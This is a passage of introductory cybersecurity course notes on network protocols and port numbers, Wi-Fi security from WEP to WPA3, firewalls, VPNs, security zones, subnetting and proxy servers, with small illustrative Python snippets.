Note: The encryption protocols mentioned do not conceal the source or destination IP address of
network traffic. This means a malicious actor can still learn some basic information about the network
traffic if they intercept it.
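The port numbers scattered through this reading can be collected into one small reference; the mapping below simply restates the well-known IANA assignments mentioned above:

```python
# Well-known ports for the protocols covered in this reading (IANA assignments).
WELL_KNOWN_PORTS = {
    "HTTP": 80,       # insecure web traffic
    "HTTPS": 443,     # web traffic encrypted with SSL/TLS
    "DNS": 53,        # normally UDP; falls back to TCP for large replies
    "SSH/SFTP": 22,   # secure shell and secure file transfer
}

for protocol, port in sorted(WELL_KNOWN_PORTS.items(), key=lambda item: item[1]):
    print(f"port {port:>3}: {protocol}")
```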
Key takeaways
The protocols you learned about in this reading are basic networking protocols that entry-level
cybersecurity analysts should know. Understanding how protocols function on a network is essential.
Cybersecurity analysts can leverage their knowledge of protocols to successfully mitigate vulnerabilities
on a network and potentially prevent future attacks.
Additional network protocols
In previous readings and videos, you learned how network protocols organize the sending
and receiving of data across a network. You also learned that protocols can be divided into
three categories: communication protocols, management protocols, and security protocols.
This reading will introduce you to a few additional concepts and protocols that will come
up regularly in your work as a security analyst. Some protocols are assigned port numbers
by the Internet Assigned Numbers Authority (IANA). These port numbers are included in
the description of each protocol, if assigned.
Network Address Translation
The devices on your local home or office network each have a private IP address that they
use to communicate directly with each other. In order for the devices with private IP
addresses to communicate with the public internet, they need to have a public IP address.
Otherwise, responses will not be routed correctly. Instead of having a dedicated public IP
address for each of the devices on the local network, the router can replace a private source
IP address with its public IP address and perform the reverse operation for responses. This
process is known as Network Address Translation (NAT) and it generally requires a router
or firewall to be specifically configured to perform NAT. NAT is a part of layer 2 (internet
layer) and layer 3 (transport layer) of the TCP/IP model.
Private IP Addresses
● Assigned by network admins
● Unique only within private network
● No cost to use
● Address ranges:
o 10.0.0.0-10.255.255.255
o 172.16.0.0-172.31.255.255
o 192.168.0.0-192.168.255.255
Public IP Addresses
● Assigned by ISP and IANA
● Unique address in global internet
● Costs to lease a public IP address
● Address ranges:
o 1.0.0.0-9.255.255.255
o 11.0.0.0-126.255.255.255
o 128.0.0.0-172.15.255.255
o 172.32.0.0-192.167.255.255
o 192.169.0.0-223.255.255.255
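The private ranges listed above can also be checked programmatically. As a rough illustration, this sketch uses Python's standard-library ipaddress module with the three RFC 1918 ranges from this reading (the function name is my own):

```python
import ipaddress

# The three private (RFC 1918) address ranges listed above.
PRIVATE_RANGES = [
    ipaddress.ip_network("10.0.0.0/8"),       # 10.0.0.0-10.255.255.255
    ipaddress.ip_network("172.16.0.0/12"),    # 172.16.0.0-172.31.255.255
    ipaddress.ip_network("192.168.0.0/16"),   # 192.168.0.0-192.168.255.255
]

def is_rfc1918_private(address: str) -> bool:
    """True if the address needs NAT to reach the public internet."""
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in PRIVATE_RANGES)
```

For example, `is_rfc1918_private("172.31.255.1")` is True, while `is_rfc1918_private("172.32.0.1")` is False because it falls just outside the 172.16.0.0/12 block.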
Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol (DHCP) is in the management family of network
protocols. DHCP is an application layer protocol used on a network to configure devices. It
assigns a unique IP address and provides the addresses of the appropriate DNS server and
default gateway for each device. DHCP servers operate on UDP port 67 while DHCP clients
operate on UDP port 68.
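The core idea of DHCP address assignment can be sketched as a toy allocator. This is not the real DHCP protocol (no leases, timers, or UDP messages); it only illustrates handing each client a unique address from a pool, and all names and addresses here are hypothetical:

```python
class ToyDhcpPool:
    """Toy model of DHCP assignment: one unused IP per client."""

    def __init__(self, network_prefix: str, first: int, last: int):
        # e.g. prefix "192.168.1." with hosts .first through .last
        self.free = [f"{network_prefix}{n}" for n in range(first, last + 1)]
        self.leases = {}  # MAC address -> assigned IP

    def request(self, mac: str) -> str:
        if mac in self.leases:        # client already has an address
            return self.leases[mac]
        ip = self.free.pop(0)         # hand out the next unused address
        self.leases[mac] = ip
        return ip

pool = ToyDhcpPool("192.168.1.", 100, 110)
```

A real DHCP server would also supply the DNS server and default gateway addresses mentioned above, and would reclaim addresses when leases expire.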
Address Resolution Protocol
By now, you are familiar with IP and MAC addresses. You’ve learned that each device on a
network has both an IP address that identifies it on the network and a MAC address that is
unique to that network interface. A device’s IP address may change over time, but its MAC
address is permanent. Address Resolution Protocol (ARP) is mainly a network access layer
protocol in the TCP/IP model used to translate the IP addresses that are found in data
packets into the MAC address of the hardware device.
Each device on the network performs ARP and keeps track of matching IP and MAC
addresses in an ARP cache. ARP does not have a specific port number.
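The ARP cache described above is essentially a lookup table from IP addresses to MAC addresses. A minimal sketch (the function and sample addresses are illustrative, not part of any real ARP implementation):

```python
# Toy ARP cache: each device keeps a table of IP -> MAC mappings.
arp_cache = {}

def arp_resolve(ip, learned_mac=None):
    """Return the cached MAC for an IP; optionally cache a new mapping."""
    if learned_mac is not None:
        arp_cache[ip] = learned_mac   # an ARP reply taught us this mapping
    return arp_cache.get(ip)          # None models a cache miss

# Simulate learning a mapping from an ARP reply.
arp_resolve("192.168.1.5", "00:1a:2b:3c:4d:5e")
```

On a real network, a cache miss would trigger an ARP broadcast asking "who has this IP?" before the packet can be delivered.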
Telnet
Telnet is an application layer protocol that allows a device to communicate with another
device or server. Telnet sends all information in clear text. It uses command line prompts to
control another device, similar to Secure Shell (SSH), but Telnet is not as secure as SSH.
Telnet can be used to connect to local or remote devices and uses TCP port 23.
Secure shell
Secure shell protocol (SSH) is used to create a secure connection with a remote system.
This application layer protocol provides an alternative for secure authentication and
encrypted communication. SSH operates over the TCP port 22 and is a replacement for less
secure protocols, such as Telnet.
Post office protocol
Post office protocol (POP) is an application layer (layer 4 of the TCP/IP model) protocol
used to manage and retrieve email from a mail server. Many organizations have a dedicated
mail server on the network that handles incoming and outgoing mail for users on the
network. User devices will send requests to the remote mail server and download email
messages locally. If you have ever refreshed your email application and had new emails
populate in your inbox, you are experiencing POP and internet message access protocol
(IMAP) in action. Unencrypted, plaintext authentication uses TCP/UDP port 110 and
encrypted emails use Secure Sockets Layer/Transport Layer Security (SSL/TLS) over
TCP/UDP port 995. When using POP, mail must finish downloading to a local device before
it can be read, and POP does not allow a user to sync emails across devices.
Internet Message Access Protocol (IMAP)
IMAP is used for incoming email. It downloads the headers of emails, but not the content.
The content remains on the email server, which allows users to access their email from
multiple devices. IMAP uses TCP port 143 for unencrypted email and TCP port 993 over the
TLS protocol. Using IMAP allows users to partially read email before it is finished
downloading and to sync emails. However, IMAP is slower than POP3.
Simple Mail Transfer Protocol
Simple Mail Transfer Protocol (SMTP) is used to transmit and route email from the sender
to the recipient’s address. SMTP works with Message Transfer Agent (MTA) software,
which searches DNS servers to resolve email addresses to IP addresses, to ensure emails
reach their intended destination. SMTP uses TCP/UDP port 25 for unencrypted emails and
TCP/UDP port 587 using TLS for encrypted emails. TCP port 25 is often used by high-volume spam. SMTP helps to filter out spam by regulating how many emails a source can
send at a time.
Protocols and port numbers
Remember that port numbers are used by network devices to determine what should be
done with the information contained in each data packet once they reach their destination.
Firewalls can filter out unwanted traffic based on port numbers. For example, an
organization may configure a firewall to only allow access to TCP port 995 (POP3) by IP
addresses belonging to the organization.
As a security analyst, you will need to know about many of the protocols and port numbers
mentioned in this course. They may be used to determine your technical knowledge in
interviews, so it’s a good idea to memorize them. You will also learn about new protocols
on the job in a security position.
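As a memorization aid, the protocols and port numbers from this reading can be collected into a small lookup table. The dictionary below is just a study sketch (the key names are my own labels), with the port values taken from the sections above:

```python
# Protocols and IANA-assigned ports covered in this reading.
WELL_KNOWN_PORTS = {
    "DHCP (server)": 67,
    "DHCP (client)": 68,
    "Telnet": 23,
    "SSH": 22,
    "POP3": 110,
    "POP3 (SSL/TLS)": 995,
    "IMAP": 143,
    "IMAP (TLS)": 993,
    "SMTP": 25,
    "SMTP (TLS)": 587,
}

def port_of(protocol: str) -> int:
    """Look up the port for a protocol, e.g. for a flash-card quiz."""
    return WELL_KNOWN_PORTS[protocol]
```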
Key takeaways
As a cybersecurity analyst, you will encounter various common protocols in your everyday
work. The protocols covered in this reading include NAT, DHCP, ARP, Telnet, SSH, POP3,
IMAP, and SMTP. It is equally important to understand where each protocol sits in
the TCP/IP model and which ports it occupies.
Wireless Protocols
In this video, we'll discuss a class of communication protocols called IEEE 802.11. IEEE 802.11,
commonly known as Wi-Fi, is a set of standards that define communications for wireless LANs.
IEEE stands for the Institute of Electrical and Electronics Engineers, an organization that
maintains Wi-Fi standards, and 802.11 is a suite of protocols used in wireless communications. Wi-Fi
protocols have adapted over the years to become more secure and reliable, aiming to provide the same
level of security as a wired connection. In 2003, a security protocol called the Wi-Fi Protected
Access, or WPA, was introduced. WPA is a wireless security protocol for devices to connect to the
internet. Since then, WPA has evolved into newer versions, like WPA2 and WPA3, which include
further security improvements, like more advanced encryption. As a security analyst, you might be
responsible for making sure that the wireless connections in your organization are secure. Let's
learn more about security measures.
The evolution of wireless security protocols
In the early days of the internet, all internet communication happened across physical cables. It wasn’t
until the mid-1980s that authorities in the United States designated a spectrum of radio wave
frequencies that could be used without a license, so there was more opportunity for the internet to
expand.
In the late 1990s and early 2000s, technologies were developed to send and receive data over radio.
Today, users access wireless internet through laptops, smart phones, tablets, and desktops. Smart
devices, like thermostats, door locks, and security cameras, also use wireless internet to communicate
with each other and with services on the internet.
Introduction to wireless communication protocols
Many people today refer to wireless internet as Wi-Fi. Wi-Fi refers to a set of standards that define
communication for wireless LANs. Wi-Fi is a marketing term commissioned by the Wireless Ethernet
Compatibility Alliance (WECA). WECA has since renamed their organization Wi-Fi Alliance.
Wi-Fi standards and protocols are based on the 802.11 family of internet communication standards
determined by the Institute of Electrical and Electronics Engineers (IEEE). So, as a security analyst, you
might also see Wi-Fi referred to as IEEE 802.11.
Wi-Fi communications are secured by wireless networking protocols. Wireless security protocols have
evolved over the years, helping to identify and resolve vulnerabilities with more advanced wireless
technologies.
In this reading, you will learn about the evolution of wireless security protocols from WEP to WPA,
WPA2, and WPA3. You’ll also learn how the Wireless Application Protocol was used for mobile internet
communications.
Wired Equivalent Privacy
Wired equivalent privacy (WEP) is a wireless security protocol designed to provide users with the same
level of privacy on wireless network connections as they have on wired network connections. WEP was
developed in 1999 and is the oldest of the wireless security standards.
WEP is largely out of use today, but security analysts should still understand WEP in case they
encounter it. For example, a network router might have used WEP as the default security protocol and
the network administrator never changed it. Or, devices on a network might be too old to support newer
Wi-Fi security protocols. Nevertheless, a malicious actor could potentially break the WEP encryption, so
it’s now considered a high-risk security protocol.
Wi-Fi Protected Access
Wi-Fi Protected Access (WPA) was developed in 2003 to improve upon WEP, address the security issues
that it presented, and replace it. WPA was always intended to be a transitional measure so backwards
compatibility could be established with older hardware.
The flaws with WEP were in the protocol itself and how the encryption was used. WPA addressed this
weakness by using a protocol called Temporal Key Integrity Protocol (TKIP). The WPA encryption
algorithm uses larger secret keys than WEP's, making it more difficult to guess the key by trial and error.
WPA also includes a message integrity check that includes a message authentication tag with each
transmission. If a malicious actor attempts to alter the transmission in any way or resend at another
time, WPA’s message integrity check will identify the attack and reject the transmission.
Despite the security improvements of WPA, it still has vulnerabilities. Malicious actors can use a key
reinstallation attack (or KRACK attack) to decrypt transmissions using WPA. Attackers can insert
themselves in the WPA authentication handshake process and insert a new encryption key instead of the
dynamic one assigned by WPA. If they set the new key to all zeros, it is as if the transmission is not
encrypted at all.
Because of this significant vulnerability, WPA was replaced with an updated version of the protocol
called WPA2.
WPA2 & WPA3
WPA2
The second version of Wi-Fi Protected Access—known as WPA2—was released in 2004. WPA2
improves upon WPA by using the Advanced Encryption Standard (AES). WPA2 also improves upon
WPA’s use of TKIP. WPA2 uses the Counter Mode Cipher Block Chain Message Authentication Code
Protocol (CCMP), which provides encapsulation and ensures message authentication and integrity.
Because of the strength of WPA2, it is considered the security standard for all Wi-Fi transmissions today.
WPA2, like its predecessor, is vulnerable to KRACK attacks. This led to the development of WPA3 in
2018.
Personal
WPA2 personal mode is best suited for home networks for a variety of reasons. It is easy to implement,
and initial setup takes less time than for the enterprise version. The global passphrase for the WPA2
personal version needs to be applied to each individual computer and access point in a network. This
makes it ideal for home networks, but unmanageable for organizations.
Enterprise
WPA2 enterprise mode works best for business applications. It provides the necessary security for
wireless networks in business settings. The initial setup is more complicated than WPA2 personal mode,
but enterprise mode offers individualized and centralized control over the Wi-Fi access to a business
network. This means that network administrators can grant or remove user access to a network at any
time. Users never have access to encryption keys, which prevents potential attackers from recovering
network keys on individual computers.
WPA3
WPA3 is a secure Wi-Fi protocol and is growing in usage as more WPA3 compatible devices are released.
These are the key differences between WPA2 and WPA3:
● WPA3 addresses the authentication handshake vulnerability to KRACK attacks, which is present
in WPA2.
● WPA3 uses Simultaneous Authentication of Equals (SAE), a password-authenticated, cipher-key-sharing
agreement. This prevents attackers from downloading data from wireless network
connections to their systems to attempt to decode it.
● WPA3 has increased encryption to make passwords more secure by using 128-bit encryption,
with WPA3-Enterprise mode offering optional 192-bit encryption.
Key takeaways
As a security analyst, knowing the history of how Wi-Fi security protocols developed helps you to better
understand what to consider when protecting wireless networks. It’s important that you understand the
vulnerabilities of each protocol and how important it is that devices on your network use the most up-to-date security technologies.
Firewalls and Network Security Measures
In this video, you'll learn about different types of firewalls. These include hardware, software, and
cloud-based firewalls. You'll also learn the difference between a stateless and
stateful firewall and cover some of the basic operations that a firewall performs. Finally, you will
explore how proxy servers are used to add a layer of security to the network. A firewall is a
network security device that monitors traffic to and from your network. It either allows traffic or it
blocks it based on a defined set of security rules. A firewall can use port filtering, which blocks or
allows certain port numbers to limit unwanted communication. For example, it could have a rule
that only allows communications on port 443 for HTTPS or port 25 for email and blocks
everything else. These firewall settings will be determined by the organization's security policy.
Let's talk about a few different kinds of firewalls. A hardware firewall is considered the most basic
way to defend against threats to a network. A hardware firewall inspects each data packet before
it's allowed to enter the network. A software firewall performs the same functions as a hardware
firewall, but it's not a physical device. Instead, it's a software program installed on a computer or on
a server. If the software firewall is installed on a computer, it will analyze all the traffic received by
that computer. If the software firewall is installed on a server, it will protect all the devices
connected to the server. A software firewall typically costs less than purchasing a separate physical
device, and it doesn't take up any extra space. But because it is a software program, it will add some
processing burden to the individual devices. Organizations may choose to use a cloud-based
firewall. Cloud service providers offer firewalls as a service, or FaaS, for organizations. Cloud-based
firewalls are software firewalls hosted by a cloud service provider. Organizations can configure the
firewall rules on the cloud service provider's interface, and the firewall will perform security
operations on all incoming traffic before it reaches the organization’s onsite network. Cloud-based
firewalls also protect any assets or processes that an organization might be using in the cloud. All
the firewalls we have discussed can be either stateful or stateless. The terms "stateful" and
"stateless" refer to how the firewall operates. Stateful refers to a class of firewall that keeps track of
information passing through it and proactively filters out threats. A stateful firewall analyzes network
traffic for characteristics and behavior that appear suspicious and stops them from entering the
network. Stateless refers to a class of firewall that operates based on predefined rules and does not
keep track of information from data packets. A stateless firewall only acts according to
preconfigured rules set by the firewall administrator. The rules programmed by the firewall
administrator tell the device what to accept and what to reject. A stateless firewall doesn't store
analyzed information. It also doesn't discover suspicious trends like a stateful firewall does. For this
reason, stateless firewalls are considered less secure than stateful firewalls. A next generation
firewall, or NGFW, provides even more security than a stateful firewall. Not only does an NGFW
provide stateful inspection of incoming and outgoing traffic, but it also performs more in-depth
security functions like deep packet inspection and intrusion protection. Some NGFWs connect to
cloud-based threat intelligence services so they can quickly update to protect against emerging cyber
threats. Now you have a basic understanding of firewalls and how they work. We learned that
firewalls can be hardware or software. We also discussed the difference between a stateless and
stateful firewall and the security benefits of a stateful firewall. Finally, we discussed next generation
firewalls and the security benefits they provide.
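The port filtering described above can be sketched as a stateless rule check. This toy Python example is illustrative only; the allowed ports are simply the ones from the example in this section (443 for HTTPS, 25 for email), and a real firewall would match on far more than the destination port:

```python
# Stateless filtering: every packet is judged against fixed rules,
# with no memory of previous packets or connections.
ALLOWED_PORTS = {443, 25}   # per the example above: HTTPS and email only

def filter_packet(dest_port: int) -> str:
    """Allow or block based solely on the destination port number."""
    return "allow" if dest_port in ALLOWED_PORTS else "block"
```

A stateful firewall, by contrast, would also consult a record of existing connections before deciding, rather than applying the same fixed rule to every packet in isolation.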
Virtual Private Network
In this video, we're going to discuss how virtual private networks, or VPNs, add security to your
network. When you connect to the internet, your internet service provider receives your network's
requests and forwards them to the correct destination server. But your internet requests include your
private information. That means if the traffic gets intercepted, someone could potentially connect
your internet activity with your physical location and your personal information. This includes
some information that you want to keep private, like bank accounts and credit card numbers. A
virtual private network, also known as a VPN, is a network security service that changes your public
IP address and hides your virtual location so that you can keep your data private when you're using a
public network like the internet. VPNs also encrypt your data as it travels across the internet to
preserve confidentiality. A VPN service performs encapsulation on your data in transit.
Encapsulation is a process performed by a VPN service that protects your data by wrapping sensitive
data in other data packets. Previously, you learned how the MAC and IP address of the destination
device is contained in the header and footer of a data packet. This is a security threat because it
shows the IP and virtual location
of your private network. You could secure a data packet by encrypting it to make sure your
information can't be deciphered, but then network routers won't be able to read the IP and MAC
address to know where to send it to. This means you won't be able to connect to the internet site or
the service that you want. Encapsulation solves this problem while still maintaining your privacy.
VPN services encrypt your data packets and encapsulate them in other data packets that the routers
can read. This allows your network requests to reach their destination, but still encrypts your
personal data so it's unreadable while in transit. A VPN also uses an encrypted tunnel between your
device and the VPN server. The encryption cannot feasibly be broken without the cryptographic key, so no one
can access your data. VPN services are simple and offer significant protection while you're on the
internet. With a VPN, you have the added assurance
that your data is encrypted, and your IP address and virtual location are unreadable
to malicious actors.
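The encapsulation idea can be sketched conceptually. In this toy Python example, toy_encrypt is a stand-in XOR transform, not real VPN cryptography, and the addresses are hypothetical; the point is only that the inner packet is scrambled while the outer header stays readable for routers:

```python
def toy_encrypt(data: bytes, key: int) -> bytes:
    # Stand-in for real encryption: XOR each byte with a key.
    # Applying it twice with the same key recovers the original data.
    return bytes(b ^ key for b in data)

def encapsulate(inner_packet: bytes, vpn_server_ip: str, key: int) -> dict:
    """Wrap an encrypted inner packet in a routable outer packet."""
    return {
        "outer_dst": vpn_server_ip,                  # routers can read this
        "payload": toy_encrypt(inner_packet, key),   # inner packet is hidden
    }

# The inner packet (with its private destination) is concealed in transit.
packet = encapsulate(b"dst=10.0.0.5 data=secret", "203.0.113.9", key=42)
```

Routers along the way only see the VPN server's address in the outer header; the VPN server decrypts the payload and forwards the inner packet to its true destination.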
Security Zones
In this section, we'll discuss a type of network security feature called a security zone. A security zone
is a segment of a network that protects the internal network from the internet. Security zones are a part of a
security technique called network segmentation that divides the network into segments. Each
network segment has its own access permissions and security rules. Security zones control who can
access different segments of a network. Security zones act as a barrier to internal networks,
maintain privacy within corporate groups, and prevent issues from spreading to the whole
network. One example of network segmentation is a hotel that offers free public Wi-Fi. The
unsecured guest network is kept separate from another encrypted network used by the hotel staff.
Additionally, an organization's network can be divided into subnetworks, or subnets, to maintain
privacy for each department in an organization. For instance, at a university, there may be a faculty
subnet and a separate student’s subnet. If there is contamination on the student's subnet, network
administrators can isolate it and keep the rest of the network free from contamination. An
organization's network is classified into two types of security zones. First, there's the uncontrolled
zone, which is any network outside of the organization's control, like the internet. Then, there's the
controlled zone, which is a subnet that protects the internal network from the uncontrolled zone.
There are several types of networks within the controlled zone. On the outer layer is the
demilitarized zone, or DMZ, which contains public-facing services that can access the internet. This
includes web servers, proxy servers that host websites for the public, and DNS servers that provide
IP addresses for internet users. It also includes email and file servers that handle external
communications. The DMZ acts as a network perimeter to the internal network. The internal
network contains private servers and data that the organization needs to protect. Inside the
internal network is another zone called the restricted zone. The restricted zone protects highly
confidential information that is only accessible to employees with certain privileges. Now, let's try to
picture these security zones. Ideally, the DMZ is situated between two firewalls. One of them filters
traffic outside the DMZ, and one of them filters traffic entering the internal network. This protects
the internal network with several lines of defense. If there's a restricted zone, that too would be
protected with another firewall. This way, attacks that penetrate the DMZ network cannot spread to
the internal network, and attacks that penetrate the internal network cannot access the restricted
zone. As a security analyst, you may be responsible for regulating access control policies on these
firewalls. Security teams can control traffic reaching the DMZ and the internal network by
restricting IPs and ports. For example, an analyst may ensure that only HTTPS traffic is allowed to
access web servers in the DMZ. Security zones are an important part of securing networks,
especially in large organizations. Understanding how they are used is essential for all security
analysts.
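The zone classification described above can be sketched by mapping subnets to zones. The subnet assignments in this Python example are hypothetical (a real organization would use its own addressing plan); it uses the standard-library ipaddress module:

```python
import ipaddress

# Hypothetical subnet assignments for the controlled-zone layers above.
ZONES = {
    "dmz": ipaddress.ip_network("192.168.10.0/24"),
    "internal": ipaddress.ip_network("192.168.20.0/24"),
    "restricted": ipaddress.ip_network("192.168.30.0/24"),
}

def zone_of(address: str) -> str:
    """Classify an IP into a security zone by subnet membership."""
    ip = ipaddress.ip_address(address)
    for name, subnet in ZONES.items():
        if ip in subnet:
            return name
    return "uncontrolled"   # anything outside the organization, e.g. the internet
```

A firewall policy could then apply different rules per zone, such as allowing only HTTPS traffic into the DMZ, as in the example above.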
Subnetting and CIDR
Earlier in this course, you learned about network segmentation, a security technique that divides
networks into sections. A private network can be segmented to protect portions of the network from the
internet, which is an unsecured global network.
For example, you learned about the uncontrolled zone, the controlled zone, the demilitarized zone, and
the restricted zone. Feel free to review the video about security zones for a refresher on how network
segmentation can be used to add a layer of security to your organization’s network operations. Creating
security zones is one example of a networking strategy called subnetting.
Overview of subnetting
Subnetting is the subdivision of a network into logical groups called subnets. It works like a network
inside a network. Subnetting divides up a network address range into smaller subnets within the
network. These smaller subnets form based on the IP addresses and network mask of the devices on the
network. Subnetting creates a network of devices to function as their own network. This makes the
network more efficient and can also be used to create security zones. If devices on the same subnet
communicate with each other, the switch keeps their transmissions within the subnet,
improving the speed and efficiency of the communications.
Classless Inter-Domain Routing notation for subnetting
Classless Inter-Domain Routing (CIDR) is a method of assigning subnet masks to IP addresses to create a
subnet. Classless addressing replaces classful addressing. Classful addressing was used in the 1980s as a
system of grouping IP addresses into classes (Class A to Class E). Each class included a limited number
of IP addresses, which were depleted as the number of devices connecting to the internet outgrew the
classful range in the 1990s. Classless CIDR addressing expanded the number of available IPv4
addresses.
CIDR allows cybersecurity professionals to segment classful networks into smaller chunks. CIDR IP
addresses are formatted like IPv4 addresses, but they include a slash (“/”) followed by a number at the
end of the address. This extra number is called the IP network prefix. For example, a regular IPv4
address uses the 198.51.100.0 format, whereas a CIDR IP address would include the IP network prefix at
the end of the address, 198.51.100.0/24. This CIDR address encompasses all IP addresses between
198.51.100.0 and 198.51.100.255. The system of CIDR addressing reduces the number of entries in
routing tables and provides more available IP addresses within networks. You can try converting CIDR
to IPv4 addresses and vice versa through an online conversion tool, like IPAddressGuide, for practice
and to better understand this concept.
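Alongside an online converter, the /24 example above can be explored with Python's standard-library ipaddress module:

```python
import ipaddress

# The CIDR block from the example: 198.51.100.0/24
net = ipaddress.ip_network("198.51.100.0/24")

print(net.network_address)    # 198.51.100.0   (first address in the block)
print(net.broadcast_address)  # 198.51.100.255 (last address in the block)
print(net.num_addresses)      # 256 addresses in a /24

# Membership check: is a given address inside the subnet?
print(ipaddress.ip_address("198.51.100.42") in net)   # True
```

Note how the /24 prefix fixes the first 24 bits, leaving 8 bits (256 values) for hosts within the subnet.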
Note: You may learn more about CIDR during your career, but it won't be covered in any additional
depth in this certificate program. For now, you only need a basic understanding of this concept.
Security benefits of subnetting
Subnetting allows network professionals and analysts to create a network within their own network
without requesting another network IP address from their internet service provider. This process uses
network bandwidth more efficiently and improves network performance. Subnetting is one component
of creating isolated subnetworks through physical isolation, routing configuration, and firewalls.
Key takeaways
Subnetting is a common security strategy used by organizations. Subnetting allows organizations to
create smaller networks within their private network. This improves the efficiency of the network and
can be used to create security zones.
Proxy Servers
Previously, we discussed how firewalls, VPNs, and security zones help to secure networks. Next,
we'll cover how to secure internal networks with proxy servers. Proxy servers are another system
that helps secure networks. A proxy server is a server that fulfills the requests of a
client by forwarding them on to other servers. The proxy server is a dedicated server that sits
between the internet and the rest of the network. When a request to connect to the network comes
in from the internet, the proxy server will determine if the connection request is safe. The proxy
server has a public IP address that is different from the rest of the private network. This hides the
private network's IP address from malicious actors on the internet and adds a layer of security.
Let's examine how this will work with an example. When a client receives an HTTPS response, they
will notice a distorted IP address or no IP address rather than the real IP address of the
organization's web server. A proxy server can also be used to block unsafe websites that users
aren't allowed to access on an organization's network. A proxy server uses temporary memory to
store data that's regularly requested by external servers. This way, it doesn't have to fetch data
from an organization's internal servers every time. This enhances security by reducing contact with
the internal server. There are different types of proxy servers that support network security. This is
important for security analysts who monitor traffic from various proxy servers and may need to
know what purpose they serve. Let's explore some different types of proxy servers. A forward proxy
server regulates and restricts a person's access to the internet. The goal is to hide a user's IP
address and approve all outgoing requests. In the context of an organization, a forward proxy server
receives outgoing traffic from an employee, approves it, and then forwards it on to the destination on
the internet. A reverse proxy server regulates and restricts the internet access to an internal server.
The goal is to accept traffic from external parties, approve it, and forward it to the internal servers.
This setup is useful for protecting internal web servers containing confidential data from exposing
their IP address to external parties. An email proxy server is another valuable security tool. It filters
spam email by verifying whether a sender's address was forged. This reduces the risk of phishing
attacks that impersonate people known to the organization. Let's talk about a real world example of
an email proxy. Several years ago when I was working at a large U.S. broadband ISP, we used a
proxy server to implement multiple layers of anti-spam filtering before a message was allowed in
for delivery. It ended up tagging around 95% of messages as spam. The proxy servers would've
allowed us to filter and then scale those filters without impacting the underlying email platform.
Proxy servers play an important part in network security by filtering incoming and outgoing traffic
and staying alert to network attacks. These devices add a layer of protection from the unsecured
public network that we call the internet.
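The caching behavior described above (serving repeat requests from temporary memory instead of contacting the internal server again) can be sketched in a few lines. This Python example is a toy: fetch_from_origin is a hypothetical stand-in for a real backend request, and the hit counter exists only to make the caching visible:

```python
# Toy caching proxy: repeat requests are served from the cache,
# reducing contact with the internal (origin) server.
cache = {}
origin_hits = {"count": 0}   # counts how often the origin is contacted

def fetch_from_origin(url: str) -> str:
    origin_hits["count"] += 1          # stand-in for a real backend request
    return f"content of {url}"

def proxy_get(url: str) -> str:
    if url not in cache:               # cache miss: ask the origin once
        cache[url] = fetch_from_origin(url)
    return cache[url]                  # cache hit: origin is not contacted
```

Requesting the same URL twice contacts the origin only once, which is the security and efficiency benefit the section describes.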
Virtual networks and privacy
This section of the course covered a lot of information about network operations. You reviewed the
fundamentals of network architecture and communication and can now use this knowledge as you learn
how to secure networks. Securing a private network requires maintaining the confidentiality of your
data and restricting access to authorized users.
In this reading, you will review several network security topics previously covered in the course,
including virtual private networks (VPNs), proxy servers, firewalls, and security zones. You'll continue
to learn more about these concepts and how they relate to each other as you continue through the
course.
Common network protocols
Network protocols are used to direct traffic to the correct device and service depending on the kind of
communication being performed by the devices on the network. Protocols are the rules used by all
network devices that provide a mutually agreed upon foundation for how to transfer data across a
network.
There are three main categories of network protocols: communication protocols, management
protocols, and security protocols.
1. Communication protocols are used to establish connections between servers. Examples include
TCP, UDP, and Simple Mail Transfer Protocol (SMTP), which provides a framework for email
communication.
2. Management protocols are used to troubleshoot network issues. One example is the Internet
Control Message Protocol (ICMP).
3. Security protocols provide encryption for data in transit. Examples include IPSec and SSL/TLS.
Some other commonly used protocols are:
● HyperText Transfer Protocol (HTTP). HTTP is an application layer communication protocol. This
allows the browser and the web server to communicate with one another.
● Domain Name System (DNS). DNS is an application layer protocol that translates, or maps, host
names to IP addresses.
● Address Resolution Protocol (ARP). ARP is a network layer communication protocol that maps IP
addresses to physical machines or a MAC address recognized on the local area network.
Wi-Fi
This section of the course also introduced various wireless security protocols, including WEP, WPA,
WPA2, and WPA3. WPA3 encrypts traffic with the Advanced Encryption Standard (AES) cipher as it
travels from your device to the wireless access point. WPA2 and WPA3 offer two modes: personal and
enterprise. Personal mode is best suited for home networks while enterprise mode is generally utilized
for business networks and applications.
Network security tools and practices
Firewalls
Previously, you learned that firewalls are network virtual appliances (NVAs) or hardware devices that
inspect and can filter network traffic before it’s permitted to enter the private network. Traditional
firewalls are configured with rules that tell it what types of data packets are allowed based on the port
number and IP address of the data packet.
There are two main categories of firewalls.
● Stateless: A class of firewall that operates based on predefined rules and does not keep track of information from data packets
● Stateful: A class of firewall that keeps track of information passing through it and proactively filters out threats. Unlike stateless firewalls, which require rules to be configured in two directions, a stateful firewall only requires a rule in one direction. This is because it uses a "state table" to track connections, so it can match return traffic to an existing session.
Next generation firewalls (NGFWs) are the most technologically advanced firewall protection. They
exceed the security offered by stateful firewalls because they include deep packet inspection (a kind of
packet sniffing that examines data packets and takes actions if threats exist) and intrusion prevention
features that detect security threats and notify firewall administrators. NGFWs can inspect traffic at the
application layer of the TCP/IP model and are typically application aware. Unlike traditional firewalls
that block traffic based on IP address and port, NGFW rules can be configured to block or allow traffic
based on the application. Some NGFWs have additional features like Malware Sandboxing, Network
Anti-Virus, and URL and DNS Filtering.
Proxy servers
A proxy server is another way to add security to your private network. Proxy servers utilize network
address translation (NAT) to serve as a barrier between clients on the network and external threats.
Forward proxies handle queries from internal clients when they access resources external to the
network. Reverse proxies function opposite of forward proxies; they handle requests from external
systems to services on the internal network. Some proxy servers can also be configured with rules, like a
firewall. For example, you can create filters to block websites identified as containing malware.
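The filtering behavior described above can be sketched as a simple decision function. The blocklist entries below are hypothetical names invented for the example; real proxy servers use policy engines and threat-intelligence feeds rather than a hardcoded set.

```python
# Toy sketch of a forward proxy's filtering rule, using an assumed
# (hypothetical) blocklist of domains identified as containing malware.
BLOCKLIST = {"malware-example.test", "phishing-example.test"}

def proxy_decision(requested_host: str) -> str:
    """Decide whether the proxy forwards a client's request or blocks it."""
    if requested_host in BLOCKLIST:
        return "BLOCKED"
    # Otherwise, the proxy fetches the resource on the client's behalf,
    # hiding the client's internal IP address from the external server.
    return "FORWARDED"

print(proxy_decision("example.com"))           # FORWARDED
print(proxy_decision("malware-example.test"))  # BLOCKED
```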
Virtual Private Networks (VPN)
A VPN is a service that encrypts data in transit and disguises your IP address. VPNs use a process called
